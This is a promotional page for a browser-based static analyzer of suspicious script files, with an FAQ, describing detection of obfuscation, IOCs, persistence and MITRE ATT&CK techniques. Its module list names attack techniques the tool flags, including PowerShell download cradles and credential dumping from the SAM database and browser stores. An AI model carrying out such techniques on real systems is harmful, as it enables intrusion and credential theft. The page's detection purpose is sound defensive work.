Free static analysis for suspicious script files. Detect dangerous APIs, obfuscation techniques, IOCs, and MITRE ATT&CK techniques — all processed locally in your browser. Files never leave your device.
Drag & drop a script file here, or click to browse
Max size: 5.00 MB
Supported file types
Drag and drop or browse for a script file. Supports HTA, VBScript, JavaScript, PowerShell, batch, WSF, and more.
The file is parsed entirely in your browser. Pattern matching detects dangerous APIs, obfuscation, IOCs, and MITRE ATT&CK techniques.
Review a detailed verdict with severity-ranked findings, extracted IOCs, embedded script separation, and obfuscation scoring.
The analyzer runs 12 detection modules against every script file, mapping findings to MITRE ATT&CK techniques and extracting actionable IOCs.
Generates a cryptographic fingerprint for the file using the Web Crypto API for threat intel lookups.
Measures content randomness (0–8 scale) to detect packed, encrypted, or heavily obfuscated scripts.
Flags WScript.Shell, PowerShell download cradles, ActiveX objects, and other high-risk API calls.
Identifies Base64 encoding, string concatenation, Chr/fromCharCode abuse, and variable name randomization.
Extracts URLs, IP addresses, and domains used for C2 communication, payload downloads, or data exfiltration.
Identifies command execution patterns, process injection, and shell invocation methods.
Detects registry modifications, scheduled task creation, startup folder manipulation, and service installation.
Flags attempts to access SAM database, browser credential stores, and credential dumping techniques.
Extracts IPs, domains, URLs, emails, file hashes, Windows paths, and registry keys as indicators of compromise.
Parses HTA, WSF, and SCT files to extract embedded <script> blocks for individual analysis.
Maps every finding to specific MITRE ATT&CK technique IDs for standardized threat classification.
Generates a scored verdict (clean/suspicious/malicious) with severity-ranked findings across all modules.
Static analysis examines a file's code and structure without executing it. Unlike dynamic analysis (sandboxing), which runs the file to observe behavior, static analysis parses the source code to identify dangerous patterns, obfuscation techniques, and indicators of compromise. This makes it fast, safe, and suitable for triaging suspicious files before deeper investigation.
Malicious scripts share common characteristics that static analysis can detect:
The obfuscation score (0\u2013100) quantifies how heavily a script hides its true purpose. Higher scores indicate more aggressive obfuscation:
0 - 20
Clean
21 - 40
Low
41 - 60
Moderate
61 - 100
Heavy
The analyzer supports the most common script file formats used in malware delivery:
.hta
HTML Application
.vbs / .vbe
VBScript
.js / .jse
JavaScript
.ps1
PowerShell
.bat / .cmd
Batch
.wsf
Windows Script File
.wsh
Windows Script Host
.sct
Scriptlet
Unlike cloud-based scanners that upload files to remote servers, this tool performs all analysis entirely in your browser using client-side JavaScript. Your files are never transmitted, stored, or shared with any third party. This makes it safe to analyze sensitive, classified, or proprietary files without data leakage concerns.
A script file analyzer performs static analysis on script files (HTA, VBS, JS, PowerShell, batch) to detect dangerous APIs, obfuscation techniques, indicators of compromise (IOCs), and known malware patterns — without executing the file. It helps security analysts triage suspicious files safely.
Yes, completely free with no account required. Upload any supported script file and get a full static analysis report including verdict, findings, IOCs, and obfuscation scoring. All analysis runs in your browser — files are never uploaded to any server.
The tool supports 12 file types: HTA (.hta), VBScript (.vbs, .vbe), JavaScript (.js, .jse), PowerShell (.ps1), batch (.bat, .cmd), Windows Script File (.wsf), Windows Script Host (.wsh), Scriptlet (.sct), and plain text (.txt). Maximum file size is 5 MB.
No. All analysis runs entirely in your browser using client-side JavaScript. Your files are never uploaded, transmitted, or stored on any server. This makes it safe to analyze sensitive or classified files without data leakage concerns.
The analyzer detects dangerous API calls (WScript.Shell, PowerShell download cradles, ActiveX objects), obfuscation techniques (Base64 encoding, string concatenation, character code manipulation), network indicators, persistence mechanisms, credential access patterns, and maps findings to MITRE ATT&CK technique IDs.
The obfuscation score (0–100) measures how heavily a script uses techniques to hide its true purpose — Base64 encoding, string concatenation, character code conversion, variable name randomization, and entropy anomalies. Legitimate scripts typically score below 20; heavily obfuscated malware often scores above 60.
IOCs (Indicators of Compromise) are observable artifacts that indicate malicious activity — IP addresses, domains, URLs, email addresses, file hashes, Windows file paths, and registry keys. Extracting them allows analysts to pivot into threat intelligence lookups, block malicious infrastructure, and correlate with other incidents.
This tool focuses on static analysis of script files specifically — parsing code to identify dangerous patterns, obfuscation, and IOCs with MITRE ATT&CK mapping. VirusTotal focuses on hash reputation across antivirus engines. Additionally, this tool runs entirely in your browser with no file upload, while VirusTotal requires uploading files to their servers.
The DFIR Platform provides dynamic sandbox analysis, multi-engine file reputation, automated IOC enrichment, and a full investigation workflow. Free tier available.